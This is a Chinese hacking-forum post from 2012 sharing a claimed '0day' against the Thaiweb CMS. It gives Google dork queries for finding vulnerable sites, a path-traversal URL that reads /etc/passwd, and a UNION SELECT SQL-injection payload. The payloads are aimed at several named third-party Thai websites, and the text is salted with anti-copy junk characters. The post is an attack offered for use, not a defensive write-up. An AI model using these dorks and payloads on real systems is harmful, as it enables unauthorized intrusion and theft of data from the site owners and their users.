找回密码
 立即注册
查看: 2778|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
8 {$ A0 }8 J- U! E# m0 i8 l+ }5 O% z, ?  `+ e8 g8 l* o% ]
intext:powered by Thaiweb+ I0 X% ?7 t, W! H- _+ ]
* Q% |; W1 G! X) R4 Z% \- \- c
inurl:index.php?page=board.php. b$ S- s' ?' X6 n' U7 u

$ T3 E5 E  K2 x
( v! C$ s7 Y# U2 W2 q9 R8 b' t8 X4 ~4 F% x( `. C# G. m
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
) B/ K; v, p+ _3 r' h, s
$ t1 {" B: S) t* F
* b4 r/ W) g9 G, o
  h7 t5 J; n" t! `利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
4 ~' o( V, L9 `  l  W- |* E* [7 j% s9 c" ?- Z

2 i% t* O; R  H* _# n# }& W! {& _/ O- `2 p' [
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
. x& [) l/ y  }' w& E  J  N8 f# l
, b6 V; z1 {2 h/ k/ Hhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--5 d. p1 K# D6 H
' q; p# t& Q% U& J* Y# T1 J6 V8 f
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--! H4 j% f! x1 q2 D" W' L5 w3 \( Z+ K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表